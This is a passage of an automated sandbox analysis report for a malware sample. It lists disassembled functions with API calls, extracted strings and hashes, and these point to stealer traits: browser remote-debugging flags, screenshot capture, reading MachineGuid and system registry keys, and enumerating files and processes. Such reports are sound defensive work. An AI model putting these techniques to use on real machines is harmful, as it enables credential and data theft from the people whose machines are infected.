                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: N-`
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-3407581833
                                                                                                                                                                                                                                                                                            • Opcode ID: eace18cfdea52badcbf0b24e5d0a25599bcf84b3f0cedbea6f9fb6112a0eaf8b
                                                                                                                                                                                                                                                                                            • Instruction ID: bfc0c55214930d693d6a9e4c20c5a6b406b452c8cd58e231ce84683c647d9d8e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eace18cfdea52badcbf0b24e5d0a25599bcf84b3f0cedbea6f9fb6112a0eaf8b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE012753021556BD750DF6EDC86F5B36ACAF86348F094038B504DB3D2DA609C288755
                                                                                                                                                                                                                                                                                            Function 00421C6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16libraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(Gdiplus.dll), ref: 00421C7F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                            • String ID: 3}*X$Gdiplus.dll
                                                                                                                                                                                                                                                                                            • API String ID: 1029625771-3385796832
                                                                                                                                                                                                                                                                                            • Opcode ID: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
                                                                                                                                                                                                                                                                                            • Instruction ID: 3fe45f8394e78795334f831f8f6b676fc398847a8e65ceccf9ffb3b8370cb1d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E08C3930060ADFC704DF65C894E1873A2FB9D30431580B9C8428B322E77AA80ACB88
                                                                                                                                                                                                                                                                                            Function 004236F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004236FE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                                                                                                                                                                            • String ID: 5$#w$5$#w
                                                                                                                                                                                                                                                                                            • API String ID: 560597551-2883133298
                                                                                                                                                                                                                                                                                            • Opcode ID: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c70d1fc7905766f050714cb572277ef9d259369ec2c40e01a949b1e957500cb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BC04CE76450007BE1629BD9ED82B3B23A4679EA80FA80415B321C26D0D618D6115A1A
                                                                                                                                                                                                                                                                                            Function 0040E4B8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: --remote-debugging-port=9223 --profile-directory="$$|X
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-1363042206
                                                                                                                                                                                                                                                                                            • Opcode ID: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ba3319f07a7289698a11f05052de0d729129f79ef8d96ea643ee3d8260e6b4f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219FBAA421009FC754DB68DC91BED77E5BF8A304F084829E815D7311D774AA24CF4A
                                                                                                                                                                                                                                                                                            Function 004224D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseWindow
                                                                                                                                                                                                                                                                                            • String ID: screenshot.jpg
                                                                                                                                                                                                                                                                                            • API String ID: 2868366576-673422685
                                                                                                                                                                                                                                                                                            • Opcode ID: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
                                                                                                                                                                                                                                                                                            • Instruction ID: 1474f4eb416e69a59470140b2970e150b16aab5e9dd82b7fb77fdc4fb0d98ae7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22414C7AA002049FCB05EFA9DC819DDB7F6FF893147084426E819E7320DB30AE16CB95
                                                                                                                                                                                                                                                                                            Function 0040D684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040D775
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID: $|X
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-3892261830
                                                                                                                                                                                                                                                                                            • Opcode ID: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bb2ff5dcfc8d279bcf81fe524ae3fa2dc5d0f95ca336393724a20a6615c9046
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61317EBA9416089BDB10CFA8DC81AEDB7B5FF84304F05C919DC59A7215EB30BA58CF91
                                                                                                                                                                                                                                                                                            Function 0041FFEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?), ref: 004200C5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: DisplayVersion
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-1932467951
                                                                                                                                                                                                                                                                                            • Opcode ID: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
                                                                                                                                                                                                                                                                                            • Instruction ID: cf9f5ad6a68376e2735318beace1d251c566c4efb26f65f4e476611a35502c4e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 562144753042059FD358DB5DDC91F2AB3EABFC5204F08851EA956C3362DBB4A908CB19
                                                                                                                                                                                                                                                                                            Function 0040764D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                                                            • String ID: https
                                                                                                                                                                                                                                                                                            • API String ID: 2038078732-1056335270
                                                                                                                                                                                                                                                                                            • Opcode ID: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
                                                                                                                                                                                                                                                                                            • Instruction ID: df26f4550a862e9fd684f022062cfcdb87b4dfc3a6da9a7f5230f916b3431924
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC218179A002459BC700DF6CED81E9A77F9FF89204B088128EC15D7316E674EE54DB99
                                                                                                                                                                                                                                                                                            Function 0042BF5B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0042C012
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-4073750446
                                                                                                                                                                                                                                                                                            • Opcode ID: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bfc89935805b3c9f140502e9bada0774c28768e2a75f6990908da1cd339226d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F21FDB25183469BD314DF64DC90FABB3A4FFD5304F048A2CE85883221EB78B659CB95
                                                                                                                                                                                                                                                                                            Function 0041F27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F2E3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-2278330950
                                                                                                                                                                                                                                                                                            • Opcode ID: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
                                                                                                                                                                                                                                                                                            • Instruction ID: 2e25e882f5a7e2b19922bce7a740613f80a7e1c0cd2294e75e808192a13d07e7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0C8B57005046FD208DB59EC96E2B73AEDBC2298B19403CF805C7352D6A19C14C625
                                                                                                                                                                                                                                                                                            Function 0041F8D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119), ref: 0041F939
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-1200804856
                                                                                                                                                                                                                                                                                            • Opcode ID: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
                                                                                                                                                                                                                                                                                            • Instruction ID: afa0995c9104d54c0513139320a2a32bada2c33ac1025a4ee98fc1a0a3f950aa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9F046B5740104AFD218DF69DC96E3B379EEBC6258F08402CF90AD7352E6B0AC18C768
                                                                                                                                                                                                                                                                                            Function 0041EDD1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 0041EE12
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InformationVolume
                                                                                                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                                                                                                            • API String ID: 2039140958-1037565863
                                                                                                                                                                                                                                                                                            • Opcode ID: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
                                                                                                                                                                                                                                                                                            • Instruction ID: 92e8b87a2725497af17e58081da3f9891e214a7b1a9627bcd9299335e7855597
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F50171B1C483809FD300EF78DC9899ABBE5AFC5204F09D92DE49987321E674E695CB46
                                                                                                                                                                                                                                                                                            Function 00420499 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 004204D3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: MachineGuid
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-4186287252
                                                                                                                                                                                                                                                                                            • Opcode ID: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bd19849ba9bfde11fb18e584a279c445fdcfc572076ffcf1604942d4b869d57
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F09637204114AFD314DB4AFCC4D9B77A8FB86214F04043DF6ADC3211E664A919C765
                                                                                                                                                                                                                                                                                            Function 0041F2FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 0041F336
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
